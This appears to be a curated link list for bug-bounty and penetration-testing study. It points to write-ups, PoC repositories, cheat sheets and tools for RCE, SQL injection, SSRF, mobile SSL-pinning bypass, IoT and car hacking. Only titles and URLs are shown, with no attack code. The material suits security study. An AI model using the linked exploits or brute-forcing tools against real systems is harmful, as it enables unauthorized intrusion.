<a href="https://frycos.github.io/vulns4free/2022/12/02/rce-in-20-minutes.html">-Pre-Auth RCE with CodeQL in Under 20 Minutes </a>
<a href="https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980">-Facebook SMS Captcha Was Vulnerable to CSRF Attack</a>
<a href="https://blog.bricked.tech/posts/tmnf/part1/">-Hacking TMNF: Part 1 - Fuzzing the game server</a>
<a href="https://blog.bricked.tech/posts/tmnf/part2/">-Hacking TMNF: Part 2 - Exploiting a blind format string</a>
<a href="https://bountyget.medium.com/rce-on-starbucks-singapore-and-more-for-5600-926c930bb61e">-RCE on Starbucks Singapore and more for $5600</a>
<a href="https://medium.com/@Sm9l/bug-bounty-recon-vertical-correlation-and-the-secret-to-succeeding-cdd532c777c9">-Bug Bounty Recon: Vertical Correlation (and the secret to succeeding)</a>
<a href="https://www.wordfence.com/blog/2022/02/critical-vulnerabilities-in-php-everywhere-allow-remote-code-execution/">-Critical Vulnerabilities in PHP Everywhere Allow Remote Code Execution</a>
<a href="https://blog.intigriti.com/2021/10/06/bug-bytes-141-sesh-gremlin-attack-rce-via-password-field-pwning-xmlsec-for-info-disclosure-and-bounties/">-Sesh Gremlin attack, RCE via password field & Pwning XMLSec for info disclosure and bounties</a>
<a href="https://www.rcesecurity.com/2022/11/from-zero-to-hero-part-1-bypassing-intel-dcms-authentication-cve-2022-33942/">-Bypassing Intel DCM’s Authentication by Spoofing Kerberos and LDAP Responses (CVE-2022-33942)</a>
<a href="https://hackerone.com/reports/584603">-RCE on CS:GO client using unsanitized entity ID in EntityMsg message</a>
<a href="https://github.com/jonathandata1/ios_15_rce">-Remote Code Execution V1 For iOS 15 sent through airdrop after the device was connected to a trusted host</a>
<a href="https://medium.com/@kojodaprogrammer/full-account-takeover-ato-a-tale-of-two-bugs-d1b3765ff1de">-Full Account takeover (ATO) — a tale of two bugs</a>
<a href="https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/">-A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection</a>
<a href="https://notifybugme.medium.com/chaining-an-blind-ssrf-bug-to-get-an-rce-92c09de3c0ba">-Chaining an Blind SSRF bug to Get an RCE</a>
<a href="https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398">-How I Escalated a Time-Based SQL Injection to RCE</a>
<a href="https://infosecwriteups.com/exploiting-password-reset-poisoning-b748797f0661">-Exploiting Password Reset Poisoning for account takeover and max bounty!</a>
<a href="https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md">-CVE-2021-26084 Remote Code Execution on Confluence Servers</a>
<a href="https://labs.nettitude.com/blog/exploiting-onlyoffice-web-sockets-for-unauthenticated-remote-code-execution/">-CVE-2021-43444 to 43449: Exploiting ONLYOFFICE Web Sockets for Unauthenticated Remote Code Execution</a>
<a href="https://radianid.medium.com/chaining-open-redirect-with-xss-to-account-takeover-36acf218a6d5">-Chaining Open Redirect with XSS to Account Takeover</a>
<a href="https://twitter.com/OAcybersecurity#bugbounty">-FORD Session token URL lead to Reflected XSS</a>
<a href="https://notifybugme.medium.com/escalating-ssrf-to-accessing-all-user-pii-information-by-aws-metadata-aabcfd5a3e0e">-Escalating SSRF to Accessing all user PII information by aws metadata</a>
<a href="https://medium.com/@shakti.gtp/an-out-of-scope-domain-leads-to-a-critical-bug-1500-f228d2c7db4b">-An Out Of Scope domain Leads To a Critical Bug[$1500] </a>
<a href="https://cybervelia.com/?p=736">-GraphQL exploitation – All you need to know</a>
<a href="https://blog.forcesunseen.com/graphql-security-testing-without-a-schema">-GraphQL Security Testing Without a Schema</a>
<a href="https://www.whiteoaksecurity.com/blog/graphql-batching-attacks-turbo-intruder/">-GraphQL Batching Attacks: Turbo Intruder</a>
<a href="https://rashahacks.com/idor-in-graphql-query-leaking-private-photos-of-a-million-app-2c12c7e9dea7">-IDOR in GraphQL Query Leaking Private Photos of a Million $ App</a>
<a href="https://feed.bugs.xdavidhu.me/bugs/0017">-Header spoofing via a hidden parameter in Facebook Batch GraphQL APIs</a>
# Android Application Testing (Methods + Tools)
<a href="https://blog.cobalt.io/getting-started-with-android-application-security-6f20b76d795b">-Getting started with Android Application Security</a>
<a href="https://zerodayhacker.com/using-an-android-emulator-for-api-hacking">-Using an Android emulator for API hacking</a>
<a href="https://www.hackingarticles.in/android-penetration-testing-frida/">-Android Penetration Testing: Frida </a>
<a href="https://github.com/Cyber-Buddy/APKHunt">-APKHunt - static code analysis tool for Android apps that is based on the OWASP MASVS framework</a>
<a href="https://gist.github.com/incogbyte/1e0e2f38b5602e72b1380f21ba04b15e">-Frida script to bypass common methods of sslpining Android</a>
<a href="https://medium.com/@yoshimlutfi/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62">-ByPass SSL Pinning with IP Forwarding | iptables</a>
<a href="https://kishorbalan.medium.com/its-all-about-android-ssl-pinning-bypass-and-intercepting-proxy-unaware-applications-91689c0763d8">-It's all about Bypassing Android SSL Pinning and Intercepting Proxy Unaware applications.</a>
<a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1368230">-SameSite cookie bypass on Android by redirecting to to intent-picker with PoC code ($5,000 bounty)</a>
<a href="https://hackerone.com/reports/401793">-Insecure deeplink leads to sensitive information disclosure</a>
<a href="https://github.com/cyberheartmi9/Frida-Guide/blob/main/Frida%20Guide/Frida%20Guide.md">-How to Write Frida Hook For Android</a>
<a href="https://servicenger.com/mobile/facebook-android-webview-vulnerability/">-Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary website </a>
<a href="https://www.hebunilhanli.com/wonderland/mobile-security/android-component-security/">-Android Component Security</a>
<a href="https://github.com/gokulapap/Reconator">-Reconator - Automated Recon for Pentesting & Bug Bounty</a>
<a href="https://servicenger.com/blog/mobile/android/facebook-messenger-for-android-indirect-thread-deletion/">-Facebook Messenger for Android indirect thread deletion vulnerability</a>
<a href="https://www.oliviaohara.com/keybase">-Keybase App Vulnerability: Incomplete Cleanup of Messages In Keybase for Android/iOS - CVE-2021-34421</a>
<a href="https://dphoeniixx.medium.com/exploiting-request-forgery-on-mobile-applications-e1d196d187b3">-Exploiting Request forgery on Mobile Applications</a>
<a href="https://blog.lexfo.fr/dexguard.html">-Step-by-step guide to reverse an APK protected with DexGuard using Jadx</a>
<a href="https://github.com/Ralireza/Android-Security-Teryaagh">-Android security guides, roadmap, docs, courses, write-ups, and teryaagh</a>
<a href="https://medium.com/@dPhoeniixx/tiktok-for-android-1-click-rce-240266e78105">-TikTok for Android 1-Click RCE</a>
<a href="https://twitter.com/cyph3r_asr/status/1413438299545296902">-10 Vulnerable Android Applications for beginners to learn Android hacking</a>
<a href="https://blog.oversecured.com/Android-security-checklist-webview/">-Android security checklist: WebView</a>
<a href="https://www.eff.org/deeplinks/2022/04/mobile-mitm-intercepting-your-android-app-traffic-go">-Mobile MitM: Intercepting your Android App Traffic On the Go</a>
<a href="https://cybervelia.com/?p=733">-Mobile Bug Bounty Hunting? Enter BLE</a>
<a href="https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/">-MOBILE PENTESTING 101 – BYPASSING BIOMETRIC AUTHENTICATION</a>
<a href="https://dphoeniixx.medium.com/chaining-telegram-bugs-to-steal-session-related-files-c90eac4749bd">-Chaining bugs in Telegram for Android app to steal session-related files</a>
<a href="https://blog.nviso.eu/2022/08/18/intercept-flutter-traffic-on-ios-and-android-http-https-dio-pinning/">-Intercept Flutter traffic on iOS and Android (HTTP/HTTPS/Dio Pinning)</a>
<a href="https://blog.oversecured.com/Android-security-checklist-theft-of-arbitrary-files/">-Android security checklist: theft of arbitrary files</a>
<a href="https://github.com/randorisec/MobileHackingCheatSheet">-Basics on commands/tools/info on how to assess the security of mobile applications</a>
<a href="https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet">-Advanced SQL Injection Cheatsheet : A cheat sheet that contains advanced queries for SQL Injection of all types.</a>
<a href="https://blog.oversecured.com/Discovering-vendor-specific-vulnerabilities-in-Android/">-Discovering vendor-specific vulnerabilities in Android</a>
<a href="https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/">-Accidental $70k Google Pixel Lock Screen Bypass </a>
<a href="https://kd-200.medium.com/mobile-app-scanner-to-find-security-vulnerabilities-6989cf552058">-Mobile App Scanner to Find Security Vulnerabilities</a>
<a href="https://eshard.com/posts/pixel6_bootloader">-Pixel6: Booting up (part 1)</a>
<a href="https://eshard.com/posts/pixel6bootloader-2">-Pixel 6 bootloader: Emulation, ROP (part 2)</a>
<a href="https://eshard.com/posts/pixel6_bootloader_3">-Pixel 6 Bootloader: Exploitation (part 3)</a>
<a href="https://servicenger.com/mobile/instagram-vulnerability-turn-off-message-requests-deeplink/">-Instagram vulnerability : Turn off all type of message requests using deeplink (Android)</a>
# IOS Application Testing (Methods + Tools)
<a href="https://martabyte.github.io/ios/hacking/2022/03/13/ios-hacking-en.html">-iOS Hacking - A Beginner's Guide to Hacking iOS Apps [2022 Edition]</a>
<a href="https://thebittimes.com/ios-jailbreak-dev-wins-2m-bounty-for-finding-critical-optimism-bug-tbt11643.html">-iOS jailbreak dev wins $2M bounty for finding critical Optimism bug</a>
<a href="https://www.ryanpickren.com/safari-uxss">-Hacking the Apple Webcam (again)</a>
<a href="https://medium.com/@mk2011sharma/exploring-ios-applications-with-frida-and-objection-basic-commands-for-pentesting-4c637dbeb9fd">-Exploring iOS Applications with Frida and Objection: Basic Commands for Pentesting</a>
<a href="https://hackerone.com/reports/401793">-Insecure deeplink leads to sensitive information disclosure</a>
<a href="https://www.inversecos.com/2022/06/how-to-reverse-engineer-and-patch-ios.html">-How to Reverse Engineer and Patch an iOS Application for Beginners:</a>
<a href="https://www.evilsocket.net/2022/10/20/Reverse-Engineering-the-Apple-MultiPeer-Connectivity-Framework/index.html">-Reverse Engineering the Apple MultiPeer Connectivity Framework </a>
<a href="https://theevilbit.github.io/posts/cve-2022-32929/">-CVE-2022-32929 - Bypass iOS backup's TCC protection</a>
<a href="https://blog.impalabs.com/2211_hyperpom.html">-Hyperpom: An Apple Silicon Fuzzer for 64-bit ARM Binarie</a>
<a href="https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/">-CVE-2022-41622 and CVE-2022-41800 (FIXED): F5 BIG-IP and iControl REST Vulnerabilities and Exposures</a>
<a href="https://theevilbit.github.io/posts/cve-2022-32929/">-CVE-2022-32929 - Bypass iOS backup's TCC protection</a>
<a href="https://canmustdie.medium.com/bypass-apples-redirection-process-with-the-dot-character-c47d40537202">-Bypass Apple’s redirection process with the dot (“.”) character</a>
# Guide To Penetration Testing tools (Beginner + Intermediate + Advanced tools and techniques)
<a href="https://medium.com/r3d-buck3t/top-10-tips-for-burp-suite-72212d22328f">-Top 10 Tips for Burp Suite</a>
<a href="https://medium.com/mii-cybersec/burp-suite-extensions-rarely-utilized-but-quite-useful-8d57c5a3a06b">-Burp Suite Extensions: Rarely Utilized but Quite Useful</a>
<a href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/">-Burp Suite - solving E-mail and SMS TAN multi-factor authentication with Hackvertor custom tags</a>
<a href="https://medium.com/@kaorrosi/finding-csrf-vulnerabilities-with-burpsuite-a0a37b87eb85?source">-Finding CSRF Vulnerabilities with BurpSuite</a>
<a href="https://research.nccgroup.com/2020/12/08/tool-release-httpsignatures-a-burp-suite-extension-implementing-http-signatures/">-HTTP Signatures: A Burp Suite Extension Implementing HTTP Signatures</a>
<a href="https://portswigger.net/blog/burp-suite-roadmap-for-2021">-Burp Suite roadmap for 2021</a>
<a href="https://portswigger.net/blog/browser-powered-scanning-in-burp-suite">-Browser powered scanning in Burp Suite</a>
<a href="https://blog.yeswehack.com/yeswerhackers/tutorial/how-to-learn-write-burp-suite-extension-kotlin-setting-up/">-Learn how to write a Burp Suite extension in Kotlin – Setting up</a>
<a href="https://hogarth45.medium.com/using-intruder-to-authorization-headers-161fd873824a">-Using Intruder to Brute Force Authorization Header</a>
<a href="https://github.com/gh0stkey/CaA">-CaA - BurpSuite Collector and Analyzer </a>
<a href="https://github.com/sh1yo/x8">-x8 Hidden parameters discovery suite</a>
<a href="https://kathanp19.medium.com/params-discovering-hidden-treasure-in-webapps-b4a78509290f">-Params — Discovering Hidden Treasure in WebApps</a>
<a href="https://github.com/Ge0rg3/requests-ip-rotator">-A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.</a>
<a href="https://github.com/tomnomnom/gron">-Make JSON greppable! gron transforms JSON into discrete assignments to make it easier to grep for what you want and see the absolute 'path' to it.</a>
<a href="https://medium.com/csg-govtech/lifes-a-peach-fuzzer-how-to-build-and-use-gitlab-s-open-source-protocol-fuzzer-fd78c9caf05e">-Life’s a Peach (Fuzzer) How to Build and Use GitLab’s Open-Source Protocol Fuzzer</a>
# Jenkins Vulnerabilities
<a href="https://github.com/gquere/pwn_jenkins">-Notes about attacking Jenkins servers</a>
# API Security Testing
<a href="https://monke.ie/api-vulns-casestudy/">-A Case Study of API Vulnerabilities</a>
<a href="https://infosecwriteups.com/what-is-bola-3-digit-bounty-from-topcoder-a25e7fae0d64">-What is BOLA? 3-digit bounty from Topcoder ($$$)</a>
<a href="https://g.livejournal.com/16735.html">-New Cosmos Blockchain API DoS</a>
<a href="https://medium.com/@Mrcyberwarrior/exploiting-activity-in-medium-android-app-e2e6f3553eef">-Trigger custom URL in Medium Android app</a>
<a href="https://masturf.medium.com/how-to-exploit-firebase-realtime-database-using-rest-api-34885160fa55">-How to Exploit Public Firebase Realtime Database using REST API</a>
<a href="https://hencohen10.medium.com/microsoft-dynamics-container-sandbox-rce-via-unauthenticated-docker-remote-api-20-000-bounty-7f726340a93b">-Microsoft Dynamics Container Sandbox RCE via Unauthenticated Docker Remote API 20,000$ Bounty </a>
<a href="https://fortbridge.co.uk/research/compromising-plesk-via-its-rest-api/">-Compromising Plesk via its REST API</a>
<a href="https://salt.security/blog/missing-bricks-finding-security-holes-in-lego-apis">-Missing Bricks: Finding Security Holes in LEGO APIs</a>
# Web 3.0 Writeups
<a href="https://samcurry.net/universal-xss-on-netlifys-next-js-library/">-Exploiting Web3’s Hidden Attack Surface: Universal XSS on Netlify’s Next.js Library</a>
<a href="https://shifacyclewala.medium.com/the-rise-of-web-3-0-security-d90373b64714">-The Rise of Web 3.0 Security</a>
<a href="https://medium.com/@vamshivaran110/rce-on-admin-panel-of-web3-website-2d0acf34d6ea">-RCE on admin panel of web3 website</a>
# BlockChain Security
<a href="https://github.com/0xsha/ChainWalker">-ChainWalker is a smart contract scraper which uses RCP/IPC calls to extract the information</a>
<a href="https://github.com/blockthreat/blocksec-ctfs">-Blocksec CTFs - A curated list of blockchain security Wargames, Challenges, and Capture the Flag (CTF) competitions and solution writeups</a>
<a href="https://blog.includesecurity.com/2022/07/hunting-for-mass-assignment-vulnerabilities-using-github-codesearch-and-grep-app/">-Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app</a>
<a href="https://mirror.xyz/orenyomtov.eth/RbV_WYYTPCAObp3VsNlkgx6iQBElwulGQf586lVK7dE">-Velas Infinite Mint Vulnerability Writeup</a>
# IOT Security (Writeups + Security)
<a href="https://vulncheck.com/blog/xiongmai-iot-exploitation">-Xiongmai IoT Exploitation</a>
<a href="https://downrightnifty.me/blog/2022/12/26/hacking-google-home.html">-Turning Google smart speakers into wiretaps for $100k</a>
# Cheat-Sheets for Cybersecurity
<a href="https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac">-BigQuery SQL Injection Cheat Sheet</a>
# Famous Checklists
<a href="https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist">-Galaxy Bug Bounty : Tips and Tutorials for Bug Bounty and also Penetration Tests</a>
# Extra Practicing Labs (Critical Vulnerabilities) :
<a href="https://github.com/fengguangbin/spring-rce-war">-Spring RCE vulnerability reproduction environment </a>
<a href="https://github.com/mcdulltii/SpringShell_0-day">-PoC - Spring Core RCE 0-day Vulnerability </a>
# Car Hacking Writeups
<a href="https://programmingwithstyle.com/posts/howihackedmycar/">-How I hacked my car (2021 Hyundai Ioniq SEL) : Part 1</a>
<a href="https://programmingwithstyle.com/posts/howihackedmycarpart2/">-How I hacked my car (2021 Hyundai Ioniq SEL) : Part 2</a>
<a href="https://programmingwithstyle.com/posts/howihackedmycarpart3/">-How I hacked my car (2021 Hyundai Ioniq SEL) : Part 3</a>
<a href="https://www.mnemonic.io/resources/blog/reverse-engineering-an-ev-charger/">-Reverse engineering an EV charger</a>
<a href="https://twitter.com/samwcyo/status/1597695281881296897">-We recently found a vulnerability affecting Hyundai and Genesis vehicles where we could remotely control the locks, engine, horn, headlights, and trunk of vehicles made after 2012.</a>
<a href="https://samcurry.net/web-hackers-vs-the-auto-industry/">-Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More</a>
<a href="https://twitter.com/samwcyo/status/1597792097175674880">-More Car Hacking</a>
# A.I Based Security research writeups :
<a href="https://medium.com/@nkrohitkumar2002/chatgpt-bug-bounty-recon-automation-bd18291953cb">-ChatGPT — Bug Bounty Recon Automation</a>
|